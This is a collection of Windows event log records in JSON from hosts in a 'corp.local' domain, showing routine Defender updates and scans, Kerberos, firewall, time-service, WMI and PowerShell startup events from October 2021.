{"EventTime":"2021-10-02T12:25:41.472062+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854784008","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":43,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":13,"RecordNumber":26201,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Installation Started: Windows has started installing the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","Category":"Windows Update Agent","Opcode":"Installation","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","EventReceivedTime":"2021-10-02T12:25:43.418694+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T10:55:57.888365+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2011,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22722,"ExecutionProcessID":2080,"ExecutionThreadID":1200,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus used Dynamic security intelligence Service to discard obsolete security intelligence updates.\r\n \tCurrent security intelligence Version: 1.349.1764.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tDynamic security intelligence Type: Security intelligence update\r\n \tPersistence Path: C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\66a0feba8fedd32c86ad1770e052c7e33931412c\r\n \tDynamic security intelligence Version: 0.0.0.0\r\n \tDynamic security intelligence Compilation Timestamp: 9/1/2021 10:15:42 AM\r\n \tRemoval Reason: Automatic\r\n \tPersistence Limit Type: Duration\r\n \tPersistence Limit: 150196224","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1764.0","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Current Engine Version":"1.1.18500.10","Dynamic security intelligence Type Index":"1","Dynamic security intelligence Type":"Security intelligence update","Persistence Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\66a0feba8fedd32c86ad1770e052c7e33931412c","Dynamic security intelligence Version":"0.0.0.0","Dynamic security intelligence Compilation Timestamp":"9/1/2021 10:15:42 AM","Persistence Limit Type Index":"2","Persistence Limit Type":"Duration","Persistence Limit Value":"150196224","Removal Reason Index":"2","Removal Reason Value":"Automatic","EventReceivedTime":"2021-10-02T10:55:58.956132+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:59.004214+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16491,"ExecutionProcessID":2508,"ExecutionThreadID":2252,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Security intelligence version has been updated.\r\n \tCurrent security intelligence Version: 1.349.1764.0\r\n \tPrevious security intelligence Version: 1.349.1731.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUpdate Type: Delta\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tPrevious Engine Version: 1.1.18500.10","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1764.0","Previous security intelligence Version":"1.349.1731.0","User":"SYSTEM","SID":"S-1-5-18","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Update Type Index":"2","Update Type":"Delta","Current Engine Version":"1.1.18500.10","Previous Engine Version":"1.1.18500.10","EventReceivedTime":"2021-10-02T12:26:00.643350+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:26:04.505800+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775832","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":19,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":13,"RecordNumber":26202,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Installation Successful: Windows successfully installed the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","Category":"Windows Update Agent","Opcode":"Installation","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","serviceGuid":"{9482f4b4-e343-43b6-b170-9a65bc822c77}","EventReceivedTime":"2021-10-02T12:26:05.768272+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:13:32.254042+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":15,"SourceName":"SecurityCenter","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161650,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Updated Windows Defender status successfully to SECURITY_PRODUCT_STATE_ON.","Opcode":"Info","Data":"Windows Defender","Data_1":"SECURITY_PRODUCT_STATE_ON","EventReceivedTime":"2021-10-02T17:13:33.098819+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T15:21:05.673512+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4770,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14337,"OpcodeValue":0,"RecordNumber":190899141,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"A Kerberos service ticket was renewed.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT02$@corp.local\r\n\tAccount Domain:\t\tcorp.local\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.54\r\n\tClient Port:\t\t55396\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x10002\r\n\tTicket Encryption Type:\t0x12\r\n\r\nTicket options and encryption types are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"IT02$@corp.local","TargetDomainName":"corp.local","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-502","TicketOptions":"0x10002","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.168.2.54","IpPort":"55396","EventReceivedTime":"2021-10-02T15:21:07.361002+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:10:05.735209+05:45","Hostname":"DC01.corp.local","Keywords":"4620693217682128896","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1108,"SourceName":"Microsoft-Windows-Eventlog","ProviderGuid":"{FC65DDD8-D6EF-4962-83D5-6E5CFE9CE148}","Version":0,"TaskValue":101,"OpcodeValue":0,"RecordNumber":190895547,"ExecutionProcessID":888,"ExecutionThreadID":4896,"Channel":"Security","Message":"The event logging service encountered an error while processing an incoming event published from Microsoft-Windows-Security-Auditing.","Category":"Event processing","Opcode":"Info","UserData":"<EventProcessingFailure xmlns='http://manifests.microsoft.com/win/2004/08/windows/eventlog'><Error Code='15005'/><EventID>0</EventID><PublisherID>Microsoft-Windows-Security-Auditing</PublisherID></EventProcessingFailure>","EventReceivedTime":"2021-10-02T11:10:05.828984+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.856021+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1000,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11648,"ExecutionProcessID":2484,"ExecutionThreadID":6484,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus scan has started.\r\n \tScan ID: {49BDA8E1-EC5E-428B-86C6-09AAB271778C}\r\n \tScan Type: Antimalware\r\n \tScan Parameters: Quick Scan\r\n \tScan Resources: \r\n \tUser: NT AUTHORITY\\SYSTEM","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","Scan ID":"{49BDA8E1-EC5E-428B-86C6-09AAB271778C}","Scan Type Index":"1","Scan Type":"Antimalware","Scan Parameters Index":"1","Scan Parameters":"Quick Scan","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-10-02T17:12:50.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:40.515153+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1002,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22727,"ExecutionProcessID":2080,"ExecutionThreadID":7392,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus scan has been stopped before completion.\r\n \tScan ID: {5B64D6BD-6C43-4ACD-952A-C35E28CC637F}\r\n \tScan Type: Antimalware\r\n \tScan Parameters: Quick Scan\r\n  \tUser: NT AUTHORITY\\SYSTEM","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Scan ID":"{5B64D6BD-6C43-4ACD-952A-C35E28CC637F}","Scan Type Index":"1","Scan Type":"Antimalware","Scan Parameters Index":"1","Scan Parameters":"Quick Scan","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-10-02T11:35:42.087020+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:00:03.222568+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6013,"SourceName":"EventLog","TaskValue":0,"RecordNumber":111200,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The system uptime is 1559095 seconds.","EventData":"<Data></Data><Data></Data><Data></Data><Data></Data><Data>1559095</Data><Data>60</Data><Data>-345 Nepal Standard Time</Data><Binary>31002E003100000030000000570069006E0064006F007700730020005300650072007600650072002000320030003100390020005300740061006E00640061007200640020004500760061006C0075006100740069006F006E000000310030002E0030002E003100370037003600330020004200750069006C0064002000310037003700360033002000200000004D0075006C0074006900700072006F0063006500730073006F007200200046007200650065000000310037003700360033002E007200730035005F00720065006C0065006100730065002E003100380030003900310034002D00310034003300340000003500650032003500350039003600350000004E006F007400200041007600610069006C00610062006C00650000004E006F007400200041007600610069006C00610062006C0065000000390000003200000034003000390036000000340030003900000041006D006F0073002E006B006E006F0077006C00650064006700650062006100730065002E006C006F00630061006C0000000000</Binary>","EventReceivedTime":"2021-10-02T12:00:03.816218+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:11:09.457145+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":36,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56655,"ExecutionProcessID":1212,"ExecutionThreadID":1372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has not synchronized the system time for the last 86400 seconds because none of the time service providers provided a usable time stamp. The time service will not update the local system time until it is able to synchronize with a time source. If the local system is configured to act as a time server for clients, it will stop advertising as a time source to clients after 0 seconds. The time service will continue to retry and sync time with its time sources. Check system event log for other W32time events for more details. Run 'w32tm /resync' to force an instant time synchronization. You can control the frequency of the time source rediscovery using ClockHoldoverPeriod W32time config setting. Modify the EventLogFlags W32time config setting if you wish to disable this message.","Opcode":"Info","EventData.Name":"TMP_EVENT_TIME_SOURCE_NONE","UnsynchronizedTimeSeconds":"86400","TimeRemainingToSetLocalClockFreeRunningSeconds":"0","EventReceivedTime":"2021-10-02T12:11:10.410966+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:07:02.170965+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12288,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161539,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The client has sent an activation request to the key management service machine.\r\nInfo:\r\n0xC0020017, 0x00000000, :1688, efc25641-ea64-4338-a3a6-a870c4022da4, 2021/10/02 07:21, 1, 5, 0, 2de67392-b7a7-462a-b1ca-108dd189f588, 25","Data":"0xC0020017, 0x00000000, :1688, efc25641-ea64-4338-a3a6-a870c4022da4, 2021/10/02 07:21, 1, 5, 0, 2de67392-b7a7-462a-b1ca-108dd189f588, 25","EventData.Binary":"0000060042594648CA2AA1C65F9668A948DE2D4AF1A8C64AB7E8684ED98E7A96D3699B23E668FDD40BE144C0A54531040EFEB636FB3B36AF7590575296488654FCC3A677235F89A594C766D0DA92391F3AF3A03AF20D33E5E94F1F7AB6ACB46D1202F88D49F4EE9BCB4E8AF96AAF2F96F703EDF78EC1A7A7D1ACC7B818AA00AE1A6830DD657A31F35EBCF1EEE6A07CDCBE7B7FD16CC10EF1E29C9F219D3F661FCA22FAE4C44A7083116D42251D447EED1294867509B579B66896F2C037BDDF832585DC0639706A34F74683FDE88D6EA585EE78B8FF7E7FC015538842C34BC5D1F0ECEC06ED4B55178DD88370C4F284F37A263C2B1430DF02443139A087A8EC25EDC4826F","EventReceivedTime":"2021-10-02T13:07:03.170889+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:53.922645+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5007,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16489,"ExecutionProcessID":2508,"ExecutionThreadID":5800,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.\r\n \tOld value: \r\n \tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\MpEngine\\MpCampRing = 0x4","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","New Value":"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\MpEngine\\MpCampRing = 0x4","EventReceivedTime":"2021-10-02T12:25:55.577829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:50:15.120793+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1067,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56659,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The RD Session Host server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.\r\n.","Data":"The specified domain either does not exist or could not be contacted.\n","EventReceivedTime":"2021-10-02T12:50:15.809396+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:10:15.100213+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":2001,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11641,"ExecutionProcessID":2484,"ExecutionThreadID":5768,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has encountered an error trying to update security intelligence.\r\n \tNew security intelligence Version: \r\n \tPrevious security intelligence Version: 1.337.654.0\r\n \tUpdate Source: Microsoft Malware Protection Center\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUpdate Type: Full\r\n \tUser: NT AUTHORITY\\NETWORK SERVICE\r\n \tCurrent Engine Version: \r\n \tPrevious Engine Version: 1.1.18100.5\r\n \tError code: 0x80072f8f\r\n \tError description: A security error occurred ","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2011.6","Previous security intelligence Version":"1.337.654.0","Update Source Index":"6","Update Source":"Microsoft Malware Protection Center","User":"NETWORK SERVICE","SID":"S-1-5-20","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Update Type Index":"1","Update Type":"Full","Previous Engine Version":"1.1.18100.5","Error Code":"0x80072f8f","Error Description":"A security error occurred ","Update State Index":"1","Update State":"Search","Source Path":"https://go.microsoft.com/fwlink/?LinkID=870379&clcid=0x409&arch=x64&eng=1.1.18100.5&avdelta=1.337.654.0&asdelta=1.337.654.0&prod=77BDAF73-B396-481F-9042-AD358843EC24&ostype=0&signaturetype=0&beta=0&plat=4.18.2011.6&OsVersion=10.0.19042.685","EventReceivedTime":"2021-10-02T13:10:16.562442+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T13:34:39.694146+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4957,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896297,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":5472,"Channel":"Security","Message":"Windows Firewall did not apply the following rule:\r\n\r\nRule Information:\r\n\tID:\tCoreNet-Teredo-In\r\n\tName:\tCore Networking - Teredo (UDP-In)\r\n\r\nError Information:\r\n\tReason:\tLocal Port resolved to an empty set.","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","RuleId":"CoreNet-Teredo-In","RuleName":"Core Networking - Teredo (UDP-In)","RuleAttr":"Local Port","EventReceivedTime":"2021-10-02T13:34:41.420301+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:45.904100+05:45","Hostname":"IT03.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5860,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":20309,"ActivityID":"{C4CABCCB-A926-0000-0DBB-CCC426A9D701}","ExecutionProcessID":1904,"ExecutionThreadID":2716,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Namespace = ROOT\\CIMV2; NotificationQuery = SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'; UserName = NT AUTHORITY\\SYSTEM; ClientProcessID = 3408, ClientMachine = IT03; PossibleCause = Temporary","Opcode":"Info","UserData":"<Operation_TemporaryEssStarted xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><NamespaceName>ROOT\\CIMV2</NamespaceName><Query>SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'</Query><User>NT AUTHORITY\\SYSTEM</User><Processid>3408</Processid><ClientMachine>IT03</ClientMachine><PossibleCause>Temporary</PossibleCause></Operation_TemporaryEssStarted>","EventReceivedTime":"2021-10-02T18:56:47.848423+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:45.937451+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13826,"OpcodeValue":0,"RecordNumber":40730144,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":2052,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xd50\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CallerProcessId":"0xd50","CallerProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-10-02T18:56:46.832708+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.081390+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7040,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":111249,"ExecutionProcessID":612,"ExecutionThreadID":6828,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.","param1":"Background Intelligent Transfer Service","param2":"auto start","param3":"demand start","param4":"BITS","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.523435+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":600,"SourceName":"PowerShell","TaskValue":6,"RecordNumber":402406,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Provider \"Alias\" is Started. \r\n\r\nDetails: \r\n\tProviderName=Alias\r\n\tNewProviderState=Started\r\n\r\n\tSequenceNumber=3\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=\r\n\tRunspaceId=\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Provider Lifecycle","Opcode":"Info","EventData":"<Data>Alias</Data><Data>Started</Data><Data>\tProviderName=Alias\r\n\tNewProviderState=Started\r\n\r\n\tSequenceNumber=3\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=\r\n\tRunspaceId=\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:45:02.664106+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.523435+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":400,"SourceName":"PowerShell","TaskValue":4,"RecordNumber":402411,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Engine state is changed from None to Available. \r\n\r\nDetails: \r\n\tNewEngineState=Available\r\n\tPreviousEngineState=None\r\n\r\n\tSequenceNumber=13\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Engine Lifecycle","Opcode":"Info","EventData":"<Data>Available</Data><Data>None</Data><Data>\tNewEngineState=Available\r\n\tPreviousEngineState=None\r\n\r\n\tSequenceNumber=13\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.17763.1971\r\n\tHostId=6caa4573-d7c9-47fa-9821-6edb0451c0ca\r\n\tHostApplication=powershell.exe -WindowStyle hidden c:\\PROGRA~1\\AutorunsToWinEventLog\\AutorunsToWinEventLog.ps1\r\n\tEngineVersion=5.1.17763.1971\r\n\tRunspaceId=7c4e8408-2681-4c41-8e5b-84bf86b519c5\r\n\tPipelineId=\r\n\tCommandName=\r\n\tCommandType=\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=</Data>","EventReceivedTime":"2021-10-02T16:45:02.664106+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T16:45:02.325256+05:45","Hostname":"IT03.corp.local","Keywords":"0","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40961,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":4,"OpcodeValue":1,"RecordNumber":708639,"ActivityID":"{C4CABCCB-A926-0000-84AD-CCC426A9D701}","ExecutionProcessID":6928,"ExecutionThreadID":1316,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"PowerShell console is starting up","Category":"PowerShell Console Startup","Opcode":"Start","EventData":"","EventReceivedTime":"2021-10-02T16:45:03.678420+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
